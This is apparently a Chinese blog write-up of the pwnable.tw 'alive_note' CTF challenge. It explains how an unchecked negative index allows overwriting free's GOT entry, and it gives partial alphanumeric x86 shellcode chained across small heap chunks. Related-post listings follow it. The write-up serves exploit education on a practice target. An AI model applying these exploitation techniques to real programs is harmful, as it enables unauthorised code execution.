突然发现已经两个月没写过WP了,愧疚- -...

此题也算一道分数很高的题目,主要考察Shellcode的编写。

又是一道题目逻辑很简单的题。

首先提供了三个函数

查看,删除,添加

查看函数:

此函数中readint()使用atoi进行解析,没有检查小于0的情况,造成越解读,可以泄露libc地址(然并卵)

添加函数中一样有这个问题,并且可以任意写,

显然是一道覆盖got表的题,并且没有开启NX保护,就是可以写shellcode。

查看一下check函数

不太清楚__ctype_b_loc是什么check,不过可以fuzz一下。

发现只有如下这些是可以输入的

'''

0x0 0x20 0x30 0x31 0x32 0x33 0x34 0x35 0x36 0x37 0x38 0x39 0x41 0x42 0x43

0x44 0x45 0x46 0x47 0x48 0x49 0x4a 0x4b 0x4c 0x4d 0x4e 0x4f 0x50 0x51 0x52

0x53 0x54 0x55 0x56 0x57 0x58 0x59 0x5a 0x61 0x62 0x63 0x64 0x65 0x66 0x67

0x68 0x69 0x6a 0x6b 0x6c 0x6d 0x6e 0x6f 0x70 0x71 0x72 0x73 0x74 0x75 0x76

0x77 0x78 0x79 0x7a

\x00   0 1 2 3 4 5 6 7 8 9 A B C D E F G H I J K L M N O P Q R

S T U V W X Y Z a b c d e f g h i j k l m n o p q r s t u v w x y z

'''

而这些机器码构成的汇编就可以做很多事情了,比如参考这个文档给出的汇编指令对应关系

https://wenku.baidu.com/view/bf5227ecaeaad1f346933f86.html

作为其他的限制,shellcode每块不许超过8字节,并且使用strdup建立堆块,也就是说不能有\x00。

根据堆的分配机制,每个堆块分配的大小应该是16字节,并且是连续的,因此可以shellcode链的方法进行跳转,比如使用JNE语句等。

选择覆盖的函数使用free函数,在delete函数时触发,原因是此时在寄存器里会有堆块相关的值。

此时调用free函数时,寄存器的值为:

eax            0x811f018	0x811f018   ;堆块地址

ecx            0x0	0x0

edx            0x0	0x0

ebx            0x0	0x0

esp            0xffd9597c	0xffd9597c

ebp            0xffd959a8	0xffd959a8

esi            0xf76b7000	0xf76b7000

edi            0xf76b7000	0xf76b7000

eip            0x80484e0	0x80484e0 <free@plt>

eflags         0x296	[ PF AF SF IF ]

cs             0x23	0x23

ss             0x2b	0x2b

ds             0x2b	0x2b

es             0x2b	0x2b

fs             0x0	0x0

gs             0x63	0x63

 以此寄存器的值构造shellcode,shellcode块之间使用3个小块填充即可

'''

read(,heap,size)

shellcode

push eax  ;P  eax=heap

pop ecx   ;Y

push ebx  ;S

pop eax   ;X

push 0x7a ;jz

jnz 0x38  ;u8

eax =   ebx =  ecx = heap edx =

shellcode

pop edx   ;Z

dec eax  ;H

xor byte ptr[ecx+0x46],al ;0a5

jnz 0x39

shellcode

xor al,0x33  ;4c

xor byte ptr[ecx+0x47],al ;0a5

jnz 0x39

shellcode

push 0x33    ;j3

pop eax      ;X

xor al,0x30  ;

'''+'2L'

【pwnable.tw】 alive_note的更多相关文章

  1. 【pwnable.tw】 starbound

    此题的代码量很大,看了一整天的逻辑代码,没发现什么问题... 整个函数的逻辑主要是红框中两个指针的循环赋值和调用,其中第一个指针是主功能函数,第二个数组是子功能函数. 函数的漏洞主要在main函数中, ...

  2. 【pwnable.tw】 applestore

    做到这道题的时候正赶上iPhone 8上市,撒花~(虽然不知道为啥) 程序分析: 先进到main函数,比较简单. myCart位于bss段上,是一个长度为0x10. 主要的处理函数是handler函数 ...

  3. 【pwnable.tw】 death_note

    题目逻辑比较简单,大概增加和删除和打印三个功能: show函数中,打印各日记内容,由于这题没有给出libc文件,应该不需要泄露地址,估计用处不大: delete函数中,正常的free,然后指针修改为n ...

  4. 【pwnable.tw】 seethefile

    一开始特别懵的一道题. main函数中一共4个功能,openfile.readfile.writefile.closefile. 其中,在最后退出时有一个明显的溢出,是scanf("%s&q ...

  5. 【pwnable.kr】 asm

    一道写shellcode的题目, #include <stdio.h> #include <string.h> #include <stdlib.h> #inclu ...

  6. 【pwnable.kr】 [simple login]

    Download : http://pwnable.kr/bin/login Running at : nc pwnable.kr 9003 先看看ida里面的逻辑. 比较重要的信息时input变量再 ...

  7. 【pwnable.kr】 brainfuck

    pwnable.kr第二关第一题: ========================================= Download : http://pwnable.kr/bin/bfDownl ...

  8. 【pwnable.kr】 unlink

    pwnable.kr 第一阶段的最后一题! 这道题目就是堆溢出的经典利用题目,不过是把堆块的分配与释放操作用C++重新写了一遍,可参考<C和C++安全编码一书>//不是广告 #includ ...

  9. 【pwnable.kr】 memcpy

    pwnable的新一题,和堆分配相关. http://pwnable.kr/bin/memcpy.c ssh memcpy@pwnable.kr -p2222 (pw:guest) 我觉得主要考察的是 ...

随机推荐

  1. js 常用字符正则匹配

    写代码时需要js验证密码,百度到的验证方法,图方便保存收藏,如感兴趣请移步原博主博文!http://blog.csdn.net/x_i_y_u_e/article/details/47730135 1 ...

  2. ZeroTier 局域网组建工具

    无公网IP通过ZeroTier实现内网穿透 需求:想要在公司访问家里内网NAS,或是在家里访问公司服务 有固定的公网IP或动态的公网IP:常见的方案动态域名解析做端口转发方式等 无公网IP:常见的实现 ...

  3. Python学习第十四课——面向对象基本思想part1

    面向对象的基本思想 # 写法1 person1 = { 'name': 'hanhan', ', 'sex': '男' } def xue_xi(person): print('%s在学习' % pe ...

  4. Spring Cloud Hystrix 请求熔断与服务降级

    在Java中,每一个HTTP请求都会开启一个新线程.而下游服务挂了或者网络不可达,通常线程会阻塞住,直到Timeout.你想想看,如果并发量多一点,这些阻塞的线程就会占用大量的资源,很有可能把自己本身 ...

  5. AD7705/TM7705使用注意事项

    http://bbs.eeworld.com.cn/thread-66467-1-1.html 1 空闲是SCLK=1(C POA),DIN=1(因为写寄存器都是从写通讯寄存器开始,此时第8位必须为0 ...

  6. Linux centosVMware运行告警系统、分发系统-expect讲解、自动远程登录后,执行命令并退出、expect脚本传递参数、expect脚本同步文件、指定host和要同步的文件、shell项目-分发系统-构建文件分发系统、分发系统-命令批量执行

    一运行告警系统 创建一个任务计划crontab -e 每一分钟都执行一次 调试时把主脚本里边log先注释掉 再次执行 没有发现502文件说明执行成功了,每日有错误,本机IP 负载不高 二.分发系统-e ...

  7. java 中类加载器

    jar 运行过程和类加载机制有关,而类加载机制又和我们自定义的类加载器有关,现在我们先来了解一下双亲委派模式. java 中类加载器分为三个: BootstrapClassLoader 负责加载 ${ ...

  8. 更新Android Studio,提示后直接点更新即可。gradle 两种更新方法,我用的第二种:手动添加gradle

    直接更新即可. 更新完毕后,随即会让你更新gradle,但是会一直更新一直更新...... 解决方法: 第一种方法: 手动下载Android Studio 对应的 gradle版本,然后设置一下即可. ...

  9. 浅谈PHP组件、框架以及Composer

    本篇文章主要介绍了PHP组件.框架以及Composer,具有一定的学习价值,感兴趣的朋友可以了解一下. 什么是组件 组件是一组打包的代码,是一系列相关的类.接口和Trait,用于帮助我们解决PHP应用 ...

  10. 对iOS开发的一些认识

    从事iOS工作这么久了,我觉得对它的认识也越来越深刻.尤其是越发明白自己从事的工作属于“客户端开发”.“软件工程”分类中. 我更喜欢“客户端开发”这个词语,相对“前端开发”而言.因为前者更能充分说明面 ...